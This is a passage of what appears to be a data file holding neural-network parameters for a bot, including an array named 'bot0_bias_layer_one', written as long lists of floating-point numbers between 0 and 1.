0.7782480324485477, 0.2264608943768619, 0.9358522646734189, 0.8260098439228931, 0.006358023917044431, 0.576940915708134, 0.004867642435655961, 0.9226454595896103, 0.27941040316055454, 0.23761013168357703, 0.3188915758200127, 0.45320424629285017, 0.5559603672959241, 0.6467478169671853, 0.9830783745865121, 0.2995917597455343, 0.5340750103709117, 0.39075193232478955, 0.5710644739483935, 0.20521640107631922, 0.22196544176888167, 0.025026912433993576, 0.49200280508282446, 0.34413423903544027, 0.4883931533679793, 0.8649831349519096, 0.7237706303952507, 0.11047105003416169, 0.004307855402999494, 0.09762072710078618, 0.9987793983957689, 0.5972217315605155, 0.5399865795898457, 0.22051229829384822, 0.4042972066427978, 0.2793049581226288, 0.349461756019788, 0.8160003492535447, 0.2878821608324085, 0.12927551204552956, 0.3483199181672765, 0.3983776425979748, 0.6231150868300447, 0.6098483864641812, 0.44556518959307423, 0.8574955168192807, 0.930800274710943, 0.0007219689438567878, 0.9065122731406643, 0.4717071746417064, 0.568854857803993, 0.3663807406345614, 0.12609199711169072, 0.6981098431745754, 0.8190615538203477, 0.13201859430723462, 0.1665770665836135, 0.6074176602872432, 0.3940990337640905, 0.5160342256697236, 0.48135062991417976, 0.8960930609479207, 0.08080500609633523, 0.9363236673599779, 0.9511957414680445, 0.9326295663424289, 0.15669687090253503, 0.27193678357839, 0.8761662355539462, 0.9844672256241132, 0.6493263111065298, 0.2500222320789941, 0.4099021688883858, 0.2348348882071749, 0.6961870465014702, 0.046085016815851754, 0.7263638891996921, 0.4898704941174563, 0.8574950055516111, 0.61822108259464, 0.13397655904972983, 0.27643561993076526, 0.7765709860656006, 0.3577565098835176], [0.3877558711623732, 0.7514317697573002, 0.9639131645470678, 0.8024671643811127, 0.6298390753848633, 0.9705463669304571, 0.8688709898376573, 0.5576195343086124, 0.47289473833667695, 0.42080357048297046, 0.10660218436340163, 0.07268544732542215, 0.5776233958122731, 0.5715345910190736, 
0.3349591716707053, 0.35179616218216336, 0.055642942607390555, 0.5237309328682912, 0.5834035551189168, 0.0120711148084367, 0.12139805843695828, 0.024347112180418518, 0.025066251719856325, 0.4058602952128988, 0.13937114619292013, 0.5356302668775775, 0.055564249210826255, 0.08750845529464824, 0.4853336637108244, 0.05121321882521912, 0.8966818660578904, 0.6768806220837467, 0.04810095133283687, 0.867614556127244, 0.09155699582721466, 0.10235884606418122, 0.33824440039236103, 0.9676928002897016, 0.7227114937163324, 0.7302318836349606, 0.15536979072802082, 0.5416532978056188, 0.25831909401439557, 0.09996117855766529, 0.24397532062560645, 0.6661360393612957, 0.31966822209067813, 0.36409092713437585, 0.8404308768988108, 0.3264147405356487, 0.857787140397851, 0.22399287855036742, 0.8795672339416911, 0.6091569141080034, 0.7814608244464497, 0.14884883658408943, 0.059355291180693825, 0.9853013617617176, 0.4180918364320487, 0.11754944308938031, 0.8374597061482904, 0.41905505520237474, 0.476556659637583, 0.5118784003234753, 0.19379649065943416, 0.4249398248670314, 0.1537670225974811, 0.9268919992695379, 0.1579910482588972, 0.045138784342388716, 0.2624515531610213, 0.613333383713903, 0.5315883910690812, 0.40103947827118847, 0.5483874352804707, 0.027416075466329848, 0.9645060589940326, 0.9314545595353739, 0.9870935578479648, 0.8794611366618618, 0.5327256179466184, 0.274324846075351, 0.699660319626102, 0.7127877832123768, 0.8383954082605681, 0.40139055024798853, 0.7982610909401241, 0.9335778894232203, 0.5925332240644265], [0.021683831816291188, 0.14488576098185857, 0.21581430134213486, 0.5224732115844597, 0.8733945410912698, 0.028601972015279142, 0.748741214792977, 0.47737184971585966, 0.17644634547173854, 0.4512237509370336, 0.16425979040066252, 0.23187158913205552, 0.18090034444339342, 0.09165921542264033, 0.21878426996200007, 0.002856701807605666, 0.1282553522580966, 0.8583691404511318, 0.6925397387711056, 0.7698111993603299, 0.23077858973452514, 0.1255886239999574, 
0.007266624245474085, 0.23560898137212738, 0.1565429079150621, 0.7244613528597448, 0.002391080232125309, 0.04094849196938388, 0.7095353333608214, 0.7150812512736034, 0.6583027000160333, 0.9508581586118067, 0.3880525006540718, 0.06472818704510974, 0.23356147783785486, 0.03538544344772554, 0.34849195576776815, 0.3554699415849225, 0.281251181426851, 0.5134825842711026, 0.7569949380930084, 0.3980926264957686, 0.2414189283423238, 0.5134297485626299, 0.6367448961740705, 0.5667642316074323, 0.03734018769313996, 0.07666504007322739, 0.05001987044731093, 0.8161346215440309, 0.15386077919613905, 0.49144045701513284, 0.5978665992610493, 0.4898606145816846, 0.838502456916722, 0.16454081569839352, 0.8315748915823, 0.9461322870069585, 0.559029556481941, 0.3630411546975646, 0.9197000038933355, 0.9578713894970698, 0.7796660059057713, 0.6790974334618478, 0.7798765983652948, 0.6341299081393088, 0.8228813667963089, 0.40882455970181253, 0.3700460828155965, 0.3396086498957802, 0.4272359504764638, 0.8316485499074643, 0.7149340435888372, 0.23435158493138564, 0.18145637578631924, 0.2991343036323173, 0.3287171228023349, 0.5908230498000631, 0.9349960434593065, 0.5047193806099111, 0.05599637594835183, 0.8136863960784595, 0.9121179910469155, 0.8716972472570678, 0.5567000492102149, 0.5331970622184067, 0.6661054742771336, 0.8904604192185753, 0.8488459005257593], [0.8094654443180049, 0.7126221192764005, 0.8492874761262287, 0.6086407551780497, 0.5073299864992369, 0.8418344703277797, 0.3955750532343434, 0.08043826174319835, 0.5201155575513061, 0.7680964080024046, 0.1590478725554778, 0.673376261328889, 0.24810683507827525, 0.6842500565858487, 0.09307498532360248, 0.41062276958029387, 0.14583526681193515, 0.6557518632502922, 0.39009479598731067, 0.2858720440835312, 0.4959462405579389, 0.05815166340000477, 0.953983992874577, 0.393375787046373, 0.7554181634027353, 0.3855639201577248, 0.17845506733749916, 0.9143448353414838, 0.559690496178368, 0.16104193570813174, 0.30884768387002726, 
0.46060951897516356, 0.6162857545341939, 0.9902777531887186, 0.8003585506953921, 0.3593783470110249, 0.4120891177906931, 0.35729597465414753, 0.5901215186750373, 0.5353859647656665, 0.9030751757111752, 0.3908047656533499, 0.5735339313610855, 0.3304858627329724, 0.18228334089114606, 0.37411988212761105, 0.5030541153968817, 0.7077561071339472, 0.732368452791827, 0.9828364177630692, 0.7710382196881208, 0.4552134945630685, 0.8951881030912309, 0.9174380893314233, 0.23715023606752994, 0.560930107736667, 0.13486935715836412, 0.6385540058900997, 0.6927273952042767, 0.5713560728494848, 0.37971086771524176, 0.41838381460239027, 0.13340278163428898, 0.5749005057987757, 0.5197260705922356, 0.5681836436460878, 0.21945456218732529, 0.6332736122557842, 0.6349144158837433, 0.22659743665592968, 0.06036296466184987, 0.659188644559147, 0.49090939491332397, 0.2937355982215004, 0.5612569722644188, 0.7742712475182901, 0.8679729273619209, 0.006798297028660749, 0.9453131845389968, 0.5368060633065133, 0.10613348111308119, 0.04333798658524668, 0.7719685442142566, 0.20773787244375752, 0.6535821187878572, 0.436440304294318, 0.4823248347138438, 0.16191798792588707, 0.8222854580145592], [0.8944250872640708, 0.29410006490801255, 0.021281104376699056, 0.43626256598440216, 0.678889294211373, 0.6846235743152399, 0.8500898345739031, 0.2564785512343001, 0.4795711368772311, 0.08047766770950615, 0.4322903032873354, 0.1552745862966336, 0.651565534862407, 0.8827509983504254, 0.0500267151125251, 0.5944113477842224, 0.645669035508245, 0.2302252986362079, 0.8223340303247375, 0.40528478093733367, 0.742959385611033, 0.3767227708600003, 0.6633986658873644, 0.6664617914386145, 0.8269366398826932, 0.3831793282341889, 0.3571089225183812, 0.27186925593914135, 0.731023580017055, 0.4960883362506734, 0.04669599765142862, 0.8848306297121878, 0.6515670338000039, 0.116372337442331, 0.9639756355041745, 0.11945969073036011, 0.2429551344188905, 0.27444445573970233, 0.9972964660339627, 0.31781829176369647, 
0.49842000802660036, 0.7372446788278552, 0.6854237841654834, 0.11908645913206661, 0.4573478579741873, 0.7803908691555322, 0.5678390137249681, 0.3694568752029608, 0.5222815922149208, 0.9288767746857569, 0.7716530440989949, 0.708033113555788, 0.35316916068978865, 0.010410329175307376, 0.49767889734298, 0.4186993982986841, 0.009111452227861694, 0.544419247273247, 0.11793570921496299, 0.1071295634664623, 0.1594632357434267, 0.5821295748405844, 0.5471630312578853, 0.4274556540978818, 0.24366110456762957, 0.8885447739344826, 0.9002765195027855, 0.5153960281394975, 0.6956344704805418, 0.8739138303084868, 0.9783401893773406, 0.7663604272925063, 0.8523114635283452, 0.6656713216249854, 0.263011627864145, 0.3418285808283087, 0.6222640632883855, 0.17588879350008824, 0.7074174514593475, 0.1383476711936208, 0.343397165260687, 0.5337209213435162, 0.8666697336406812, 0.9053982628909958, 0.5345698046742966, 0.16128619406089095, 0.29333311314695754, 0.8111802673342079, 0.8226152422043591], [0.4748154032190588, 0.7132328767581909, 0.9350233720609189, 0.14522107693951036, 0.5886830895075489, 0.26451172786239807, 0.5724788060533498, 0.9555302263723741, 0.13061134069585, 0.8767847188372502, 0.425164830082733, 0.3751336852356594, 0.860403793839953, 0.7177714779145767, 0.6037121952293699, 0.5498851468587806, 0.38153089584125244, 0.143012932709922, 0.3530744133590742, 0.33460456308139463, 0.008725593823312505, 0.23912519679148225, 0.9801241126467083, 0.5916319940126042, 0.7623087170403247, 0.5139442591478972, 0.2637214284172503, 0.3598556958588859, 0.7444059806797191, 0.43959176545941714, 0.6431058680074182, 0.4373689334951909, 0.31443359958676054, 0.731144640933631, 0.32948224756333, 0.6171222632213961, 0.558226300119688, 0.9336350733105409, 0.14253457336301578, 0.4123422687348003, 0.8559003007930053, 0.15842130263734178, 0.1658482990946052, 0.3604101296699225, 0.4144231898697739, 0.3049920664908867, 0.6837401498214734, 0.0019355819087153447, 0.4970660332693665, 0.05470462449839342, 
0.22515242952765868, 0.669414349696509, 0.33108539884303956, 0.6331240173083867, 0.6068238548433896, 0.8924971738430305, 0.8217298844826574, 0.057050958933789864, 0.7153892206370338, 0.6843647359403814, 0.39987649053907104, 0.213409668313837, 0.9341856514785741, 0.5281779979515115, 0.3998621637401665, 0.6667483136461329, 0.9580038109531581, 0.80349421290491, 0.2881646376654581, 0.8148237381518537, 0.26170270060234047, 0.9044898527318312, 0.9431482616833392, 0.4693570884536783, 0.5602840155014872, 0.9932304764326271, 0.10474887800745669, 0.9914574200058177, 0.9496555245689886, 0.24138005914454252, 0.6316717058047135, 0.5018214361170384, 0.3631803258580686, 0.4031369744535125, 0.634235073765228, 0.45741494312640685, 0.7332676537209483, 0.6438408032024437, 0.5888913283483819], [0.8470074522976069, 0.7991264080752158, 0.7054017630336866, 0.5390090326859425, 0.450465167607737, 0.3784014837211357, 0.43906617255527636, 0.5382033296939857, 0.41709011272003194, 0.9622215152186111, 0.004826870852161935, 0.48099808898356766, 0.9580890767452148, 0.24218703744264736, 0.5984272656016865, 0.44785476783833555, 0.4074464470414978, 0.19693799207532792, 0.8211041423007959, 0.7402136575970782, 0.6213825378119736, 0.4659960514414494, 0.23225868661130522, 0.11349114152810791, 0.006586934558613811, 0.9727037036427693, 0.01636821222990903, 0.30568804002543815, 0.06234803349423057, 0.02462675388524982, 0.5524077424419055, 0.4959917442037728, 0.11128826784816759, 0.715144362562659, 0.7070284031668713, 0.7966463089461793, 0.48096677918930053, 0.8941347405721319, 0.8432163553208017, 0.5615533840005362, 0.22665842285607585, 0.037104922651475025, 0.9138867435801261, 0.8561119638579906, 0.5494691116938325, 0.19406402907710174, 0.6719155853899615, 0.5127510720128718, 0.37648111518915084, 0.3450085757756177, 0.4047963648470676, 0.7731065260663806, 0.40247733608775127, 0.6320001006626622, 0.929103337919123, 0.20897774571818706, 0.6456178100625248, 0.3232174767485603, 0.39687723430284727, 
0.6837676991655747, 0.9345201681779461, 0.8540335834976479, 0.19217662203438413, 0.97150310745832, 0.040995145368685315, 0.28069456425848305, 0.513765185721843, 0.55124817227775, 0.9544310124882137, 0.32038507125016, 0.30805047380723516, 0.16508064704198966, 0.1196184856851562, 0.7564186637807576, 0.11966010631532775, 0.019002124010142563, 0.7076068623880641, 0.0974782107836849, 0.7800016402087805, 0.41250566101954655, 0.7799420911959508, 0.1818916649831943, 0.37192964309947973, 0.9243063402456012, 0.1287851621740388, 0.5500385718038697, 0.30175860293705004, 0.41055516719019614, 0.6510592645884327]] bot0_bias_layer_one = [[0.3275250452843903, 0.7271768872295724, 0.26733345914303186, 0.04655575331455497, 0.32441220478337585, 0.34093175254025665, 0.7204448841942656, 0.42932121883413155, 0.7153779086439199, 0.41982018793567855, 0.7377382844745212, 0.929127131636791, 0.21832558208042752, 0.8076943811660312, 0.5275243415704276, 0.1802380624329032, 0.43663439839853524, 0.27976383158667784, 0.06775882255149179, 0.8946371742914273, 0.9701000305332398, 0.41770274517935424, 0.7414883094709883, 0.1808867389892035, 0.11892117235753419, 0.07021886542073863, 0.8813487933305021, 0.09092394870482001, 0.42328386654001326, 0.04913770243015836, 0.5982059628144897, 0.13684314640280637, 0.007119165524731796, 0.540119799371301, 0.7509253306756501, 0.2393909580818474, 0.7386822169253867, 0.843654812434101, 0.4520311393653502, 0.6794181773236585], [0.4881133809378714, 0.10777264408186005, 0.9649031152777867, 0.8971404243740327, 0.9791559939761721, 0.22600218290341156, 0.3680533482346594, 0.29364808141683896, 0.5288687136215953, 0.844291203177785, 0.6340280656610756, 0.8289974344443232, 0.8027613900965463, 0.02835748739388788, 0.5220327561094988, 0.16139088129245138, 0.2184091343908472, 0.5424805089296867, 0.3150837786499503, 0.7872032244292628, 0.7277964989717531, 0.47163838818371606, 0.3215782366182486, 0.0949802539926542, 0.008646123139260165, 0.13171277790409097, 0.649551197829059, 
0.9287596442801, 0.15517594735210272, 0.494496112455005, 0.9897914500353218, 0.12245060529239082, 0.9167487808038438, 0.7326485760224891, 0.46756089945320567, 0.11468111423896377, 0.5815875236396542, 0.49562310735741455, 0.1306418415977345, 0.641441556537048], [0.05570114597521625, 0.5980682772186662, 0.5441246868126837, 0.9629527286232146, 0.17001126854380955, 0.33295685449001833, 0.037001026122059355, 0.07189278334431581, 0.5590840825278397, 0.8071695030419245, 0.4958432132369447, 0.683723739256462, 0.7491849427583817, 0.299105533340016, 0.46939559065384384, 0.4772550496590239, 0.0644737196159374, 0.35445272311069564, 0.455552771342173, 0.10683560071445064, 0.6568633518154414, 0.4162432940305818, 0.28751873650613535, 0.16500796205753243, 0.4200772541477126, 0.8760846671552152, 0.3974844265589761, 0.7217229805551113, 0.13994187661109447, 0.7215628567846941, 0.8085029311310585, 0.4089690012346595, 0.35894753080647923, 0.6686907691593539, 0.747088706940398, 0.8934254992595548, 0.4576912586571059, 0.12538316845117725, 0.33154960526436184, 0.9714917437256508], [0.8737476639487803, 0.6605126879745623, 0.3735793825025385, 0.45243933930684443, 0.9177466800237971, 0.8995731050194395, 0.3336984685413138, 0.7232186842858778, 0.6860529374769745, 0.37072560843710234, 0.5964815484533584, 0.7190395851329352, 0.5061700938765509, 0.300293748249041, 0.45818698598501373, 0.9996857301675988, 0.9371884518350153, 0.03392005571054346, 0.8117761159828467, 0.4618958641315247, 0.1229414594949737, 0.8480107297950585, 0.6475743833480739, 0.7665054600229256, 0.17421310427690273, 0.3205317783426631, 0.5942511234242914, 0.9840273579982679, 0.10411345450085907, 0.010807155882615604, 0.44803547504160157, 0.6785995169810036, 0.8458894258092495, 0.3550638683994508, 0.49706016499337546, 0.9582307662833117, 0.4122231136881218, 0.12045148849358045, 0.1452784553630041, 0.1858442025184689], [0.9394060704000887, 0.11638838269039453, 0.1704815307003822, 0.8903849397366136, 0.8314182302189629, 
0.3262040938033697, 0.34611836218089453, 0.640107029175983, 0.8893459840320047, 0.9928455275711988, 0.7257278106403986, 0.3559389019617173, 0.6922772853188367, 0.6409801505895948, 0.6717073188590976, 0.06959726723739768, 0.7633512391610467, 0.72145449079917, 0.8312999652703744, 0.611156968098582, 0.344951546571706, 0.9956727466779229, 0.3709186923958435, 0.6298485231034381, 0.9345331514243989, 0.57316951506192, 0.03736450587337059, 0.6252592879370199, 0.5042449232815995, 0.5233872291860681, 0.1300551994216409, 0.48456766803075557, 0.5244408576394232, 0.15510287148485968, 0.42423303531734846, 0.45645616070174144, 0.06420812492753536, 0.4814945265724957, 0.20812587681905848, 0.3759048960572262], [0.34807102160231906, 0.5355327172669765, 0.19168190868425916, 0.47177396811323546, 0.6615847976001273, 0.34409464494273245, 0.4160882467243431, 0.03535367928156019, 0.8825642927202796, 0.3101508209974875, 0.9681172325543592, 0.4222062853828412, 0.9770810593430425, 0.43537863668202037, 0.30116380434493273, 0.42275975603265736, 0.8171920212147155, 0.45163167104187985, 0.6987685175013633, 0.28539123139415445, 0.2270279947130487, 0.7976994456894502, 0.8638578167665035, 0.5320829879594836, 0.3691019189255792, 0.4197196251479812, 0.5108444056353197, 0.9075009090508516, 0.3603396815555171, 0.8010757658466784, 0.6205371636605198, 0.5616712591356063, 0.9542055487181537, 0.7795802715875466, 0.5210241017193381, 0.44832781154131185, 0.9430326719099386, 0.33235809736027677, 0.537439351777638, 0.1288547623371371], [0.8376949494187801, 0.7580734421395021, 0.9526013374313822, 0.7836704240242633, 0.031082529565398143, 0.2931197214925687, 0.46274212227611833, 0.4400042706575237, 0.3568418807714908, 0.8725862875784771, 0.026573131609544998, 0.33091411006036375, 0.8685101001420565, 0.9664726263667349, 0.5930075727075903, 0.3977425070753592, 0.4791933234489828, 0.5122529721944253, 0.4949986243179548, 0.32115761066204884, 0.2571719990710837, 0.5123352164735432, 0.711426477915039, 
0.35273218987925437, 0.3981382639549541, 0.7569078695688047, 0.6714335862905793, 0.03618048220417924, 0.1418638448562517, 0.3907079011279989, 0.7635496022914924, 0.9971060327623831, 0.008238070336776815, 0.7721592756209594, 0.4325170522087902, 0.02031528355930101, 0.9658634084094332, 0.9922410528362061, 0.2657345041103858, 0.3847680513082925], [0.34306121640021436, 0.9273606777947256, 0.40213409723119065, 0.14521112307314665, 0.7696258323337549, 0.8558667880947536, 0.38795891819793893, 0.17730219291851823, 0.7644658387638474, 0.08122125881992415, 0.018147861241531782, 0.7276860927583733, 0.3764004985275261, 0.8016696987298413, 0.5061804880075447, 0.426507859082467, 0.011548753586314464, 0.8072779882953259, 0.630742825149668, 0.06778469936341869, 0.16728965800956497, 0.4797185163542439, 0.41525595280086836, 0.2709240521172047, 0.49352184286398737, 0.5063342147122715, 0.7658777404194702, 0.5515549354134741, 0.2669430898450168, 0.3437272962191662, 0.14318465947425096, 0.7304860416094893, 0.3955720080295869, 0.6324084524514856, 0.6378431611886639, 0.549195236855488, 0.9013672679098493, 0.4289686119376076, 0.7935877417257685, 0.48338085890749916], [0.5900179562537882, 0.5432954879073737, 0.19640623523574607, 0.7881818327512562, 0.15732189920206407, 0.3353849929960817, 0.7384397042908466, 0.3221335400194828, 0.9763041654344029, 0.7980606266575141, 0.8761164405235258, 0.9669580868181424, 0.31089410046909505, 0.12566953268870495, 0.7102408780354199, 0.23099740060044072, 0.9821065158526899, 0.22411722864278794, 0.9635844096852307, 0.6898131781523889, 0.07258072793484638, 0.8269677255512315, 0.08163965343762614, 0.09280739757981216, 0.6450205529429975, 0.03638220310426021, 0.7356865135167816, 0.06935094137150988, 0.6158372033572865, 0.3145841331792576, 0.9650802359425223, 0.09070756102677846, 0.19636328448638252, 0.747195485607386, 0.031869975064772516, 0.2131148991898587, 0.32567975093071355, 0.5015945859210379, 0.15200049780131453, 0.031101554637993245], 
[0.48386588787010354, 0.020264020039504782, 0.28850632614823646, 0.587757575580333, 0.855264066806549, 0.64773803876861, 0.8105920837614101, 0.23775074349020697, 0.3496258633885537, 0.7883419646313323, 0.28507336729645205, 0.07020765628740588, 0.261116933633854, 0.6029108731086765, 0.36096827371720985, 0.16162601030927404, 0.685181689441054, 0.04661628825550512, 0.07507679703724879, 0.2118689958998612, 0.2995129557690869, 0.7719621393992528, 0.5655002393494905, 0.5916212148799416, 0.8749509765668718, 0.749851647032304, 0.9213862869703966, 0.33942557129405515, 0.1444520104257332, 0.7742836702506523, 0.24634018053031304, 0.7044135128399076, 0.694242467073177, 0.4056309971260881, 0.2800779498211283, 0.2731365990024365, 0.5320224450576143, 0.036272977785647864, 0.5281527984096706, 0.6293194207765768], [0.6629150092034527, 0.9481177551802781, 0.6818026052797772, 0.28927977324053356, 0.9135973811037419, 0.9172420638192753, 0.9886101492124977, 0.06590020053191736, 0.2815659959581235, 0.866533254142697, 0.14925671526010675, 0.021882779499367566, 0.5217970771112279, 0.48693639984560444, 0.7542367031155869, 0.7145688295552209, 0.02935416994811202, 0.7465044329762184, 0.2432051676956788, 0.7516127604872034, 0.749319275628188, 0.9611595836871689, 0.2822778152432158, 0.9625092885556016, 0.27763604412954823, 0.4167474941209214, 0.20686938552939216, 0.6455401383047649, 0.6519187009365798, 0.5891287739783926, 0.6112597877688295, 0.1729925992017335, 0.805419613153654, 0.8788489148582148, 0.653468190130464, 0.6395370426899409, 0.3973476970782298, 0.5956976025828992, 0.14246867111614192, 0.15644201885670295], [0.08259373732863662, 0.4560504736040265, 0.2883114795256645, 0.3660525468265249, 0.22242704444276595, 0.8473650007000707, 0.22265397908453854, 0.6869118392843987, 0.4952519724429819, 0.39449286793938976, 0.6340153864258178, 0.5694563594587663, 0.48146323843778005, 0.2605930836672725, 0.5551468466344327, 0.04148406674186411, 0.3564135792777049, 0.655996613024885, 
0.8029575089055511, 0.5825438615005202, 0.4048914623222183, 0.06292094996223896, 0.04386840172706685, 0.4148553366035186, 0.7596478191432033, 0.07251220625272725, 0.21022708348100572, 0.059143646216438306, 0.8334201928855044, 0.08981559327034216, 0.11136242392543094, 0.6057893994041005, 0.13011545988146056, 0.9198978622381345, 0.1173709559842443, 0.1229570041270398, 0.9894977060314595, 0.12063228955341909, 0.86662603381891, 0.127111398134356], [0.7582678129338829, 0.2741467456884237, 0.9205894818829418, 0.8970273957965978, 0.8640177045119971, 0.9004054014020741, 0.0632426870058923, 0.7068058690580731, 0.08325398085315139, 0.18545933638378442, 0.9219625887078976, 0.9099537317806782, 0.5192798581826193, 0.5433035731432758, 0.31892693240033465, 0.5958118274708657, 0.7085513182987369, 0.8742207407416388, 0.6337042167065458, 0.16636616138587468, 0.8504220716679501, 0.008768137642932272, 0.3321907623718553, 0.015765311237726398, 0.4006268307494729, 0.7469836643821525, 0.045093765686219256, 0.9096433955085644, 0.5124279588034795, 0.6964588850817747, 0.4374038791902092, 0.40163344846981086, 0.0940377405456091, 0.6803775245970893, 0.952317581061096, 0.691848235447643, 0.630578647708489, 0.8803971658026046, 0.6829989674904294, 0.8303852718262916], [0.8090896331138463, 0.568366177190997, 0.588392706486379, 0.8962719606235023, 0.7516176977640856, 0.11641440386576374, 0.6270061849498927, 0.20116874019401432, 0.41949899074826935, 0.42172508036185496, 0.35500875170630464, 0.8198113206428315, 0.4143612440838118, 0.5646999651398333, 0.500621781434853, 0.6730554787535333, 0.8324057520098505, 0.31964878903806204, 0.9779807164727368, 0.5822250796671027, 0.15497205921042223, 0.3780304127482307, 0.02037115591412353, 0.3476170132717161, 0.822824867866419, 0.9493001838092929, 0.2438705052715715, 0.7753271558007888, 0.38854367293859127, 0.715202932486102, 0.21421508704378023, 0.09401032910240137, 0.9138708442333195, 0.2697944885033273, 0.23794763906014937, 0.5413753067453412, 
0.8355480831490287, 0.9665224008673267, 0.6232694765650074, 0.06498840313949972], [0.5246761862676133, 0.4754011429198042, 0.27712677192315793, 0.4395190365983982, 0.291612870302828, 0.3501510795261674, 0.572915107210903, 0.7490730211846306, 0.7604295301424613, 0.98962279751706, 0.5255422834494755, 0.08682114851304945, 0.0878966834429652, 0.5100794436351748, 0.06840872671949483, 0.0757168020683745, 0.7817354416177815, 0.3384416035064336, 0.7866604801454969, 0.27148384787217794, 0.5038003543908567, 0.4220762702765788, 0.9727594676880867, 0.08376945828416726, 0.5009847168978322, 0.6443338586086254, 0.8985585378443358, 0.8508693545537778, 0.4953378231278688, 0.5951550518812834, 0.9982953691635114, 0.5442097204468094, 0.19642106345196886, 0.8285870020719087, 0.9814792369958638, 0.8832319479979229, 0.07124900927191258, 0.09314418893683929, 0.6063864613427206, 0.8556553182464312], [0.09266230824170774, 0.7501756703687169, 0.7013863219730868, 0.5999082089908239, 0.21381797354355636, 0.9312139338924389, 0.047565550857798566, 0.12691735700960138, 0.021049112565388994, 0.1255737126910973, 0.43664400071478626, 0.1899855084546127, 0.7294932551638953, 0.28813104706521786, 0.5787777744250122, 0.17710975282007368, 0.7848352851534642, 0.4499915374894231, 0.9804009556884624, 0.5196235233891956, 0.3999290401672174, 0.6532305184050742, 0.22360698287572, 0.5866552011682303, 0.5743532924688247, 0.7683510611336455, 0.8265073265863738, 0.8502590274280851, 0.41429839881021513, 0.8749331337906685, 0.7910744561008175, 0.4417003321462504, 0.596194239102995, 0.4933194215575557, 0.13580007405579086, 0.7902386848382016, 0.8263312577868199, 0.5599769562713117, 0.15903241458711026, 0.914710505295524], [0.04274754755877619, 0.890363501626485, 0.4462670540122693, 0.2539674962670524, 0.021190779640992252, 0.7268565314944679, 0.9604580404188324, 0.7304129135176844, 0.8619533232684793, 0.47497528151081025, 0.4783731781457279, 0.389440422516651, 0.509359763351526, 0.18760319057403507, 
0.9152794225344036, 0.34660200887237536, 0.07896035136023327, 0.0643853106530643, 0.5302211374511594, 0.0888369078482032, 0.6273744926857362, 0.3954652022486038, 0.8573658904498885, 0.9726216432067643, 0.49781685935606357, 0.9881697178035863, 0.19394557506264098, 0.3005335425071226, 0.8063863366198073, 0.28148403104541, 0.756637598395929, 0.8625394353088816, 0.6076963354013876, 0.362899306775733, 0.7555980687264481, 0.004435128999818239, 0.4902779414264228, 0.2276220359584633, 0.10261717299120532, 0.15053172474296994], [0.8491689675500838, 0.08576845757310914, 0.7315120436796695, 0.33370388357766245, 0.6763541302843331, 0.953192212147401, 0.5163443619889609, 0.49595197832710214, 0.6337426437075633, 0.38620259824379, 0.8112143535707623, 0.06803841358353269, 0.13257369251081963, 0.3838463309451251, 0.6733099393710062, 0.8993854404534889, 0.9935789986015777, 0.10117253085315148, 0.5241667385219765, 0.28332460486010747, 0.5300384284154902, 0.020851912231922287, 0.2831935966660998, 0.7290772888806515, 0.4844878468759999, 0.1919539821638775, 0.07158900467312379, 0.8345308822663333, 0.10595626070438391, 0.14115086211277383, 0.4022674697011406, 0.7276474319460647, 0.7740819409818074, 0.10264594367751478, 0.2729389069011442, 0.8406722666818922, 0.10707411449043314, 0.7216539390871423, 0.3921759143708714, 0.22112722804641416], [0.09381743226127937, 0.684091309519585, 0.9827332217216279, 0.15830830501548487, 0.5592245956215205, 0.9596684459186227, 0.16652394729932507, 0.1639883621524837, 0.8380027723761255, 0.19381897907910606, 0.7493793539575553, 0.46816985471486827, 0.5550972914515669, 0.43879788207822956, 0.3269888590213187, 0.2856616459905589, 0.3242963127332841, 0.12090348263621353, 0.15718208047514026, 0.03669496048171317, 0.19182263498184038, 0.924890216846385, 0.10933121122797029, 0.48149661135575483, 0.32113143473803585, 0.4870187661500788, 0.2086877188815659, 0.10101216210989461, 0.2333687259391649, 0.964269858160798, 0.6033308965192875, 0.004601250669507229, 
0.4978756588199824, 0.020015721471325354, 0.3410020234950849, 0.02655138305705118, 0.34757319142042775, 0.02286370076800015, 0.3174841781842609, 0.7303439311767911], [0.7744506333134157, 0.1046049178732773, 0.14923426068798773, 0.3349728801978594, 0.10630864596704626, 0.11345530910524704, 0.9621631156410595, 0.23278888601649217, 0.9243040678307289, 0.09207744195892542, 0.022008337716384996, 0.8986727228597363, 0.35962971511824926, 0.8385269639297314, 0.7887108096467702, 0.47848094545776143, 0.3024621790891804, 0.3192308634868608, 0.11871669760025483, 0.5805003989370491, 0.3663753756745537, 0.10426879891641594, 0.5933528005787578, 0.594642975821688, 0.5563701741361995, 0.18969898614461034, 0.13259784241245032, 0.08231995549144955, 0.683085918693767, 0.03259705798511725, 0.8214168833888488, 0.4416694520019878, 0.10305252352626992, 0.24325046321035915, 0.9473216445709998, 0.008472930586119198, 0.7918173930679708, 0.5205644413497853, 0.8215529000048032, 0.3402958611124167], [0.9286116203023213, 0.38721273349732777, 0.8888301429519135, 0.9748382511937258, 0.21494984565439867, 0.15627364253114928, 0.3863098989196596, 0.9680373713836984, 0.23037256719173782, 0.41898825403971607, 0.7688036877056201, 0.12419758474519382, 0.8147273526990039, 0.5340674350975279, 0.3838160293764944, 0.9277687670697762, 0.5855688704039658, 0.9791723736795088, 0.5049570105610223, 0.5278026508651352, 0.6186416923924916, 0.8498150602248935, 0.19951464175087663, 0.753362754515266, 0.9364780018013896, 0.49576764734646417, 0.690116880462191, 0.6506778706316467, 0.8700539680873687, 0.4032430282349684, 0.09905001310404649, 0.24880203444549132, 0.22627483943337534, 0.29022371076137177, 0.07745777633695161, 0.6295089575058374, 0.22606277338470926, 0.7229643988452088, 0.024875314250370706, 0.9927967845547736], [0.4039806458149495, 0.44742995074214387, 0.28296382221341054, 0.7936294647745615, 0.9668900672786176, 0.5330119668769064, 0.866586550889021, 0.5105228277768916, 0.3067122449969363, 
